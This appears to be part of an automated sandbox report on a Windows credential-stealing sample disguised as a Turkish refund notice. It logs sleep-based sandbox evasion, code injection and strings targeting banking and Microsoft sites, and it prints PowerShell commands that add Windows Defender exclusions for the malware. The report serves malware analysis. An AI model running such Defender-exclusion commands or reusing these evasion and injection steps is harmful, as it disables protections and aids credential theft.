Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593497s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593280s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593061s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592731s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -592406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800 Thread sleep count: 4305 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800 Thread sleep count: 5534 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598873s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598271s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -598065s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597769s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597444s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597324s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597217s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -597108s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596873s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -596108s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595998s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595889s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595780s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595561s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595124s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -594789s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -594646s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -594024s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593916s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593719s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593609s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593470s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593356s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796 Thread sleep time: -593249s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599858 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599734 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599613 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599474 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599350 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599242 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599138 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597853 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597732 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597515 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596968 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596749 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596640 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596421 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596312 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596093 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595873 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595765 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595542 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595405 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595275 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595145 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594648 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594218 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594053 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593937 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593827 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593718 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593609 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593497 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593390 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593280 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593171 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593061 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592953 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592843 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592731 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592624 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592515 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598271
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598065
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597769
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597444
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597324
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597217
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595998
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595889
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595561
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594789
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594646
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594024
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593916
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593719
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593609
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593470
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593356
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593249
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3762229571.00000000011A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SOFcFE.exe, 00000014.00000002.3761035622.0000000001016000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A797B0 LdrInitializeThunk, 20_2_06A797B0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory written: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory written: C:\Users\user\AppData\Roaming\SOFcFE.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" Jump to behavior
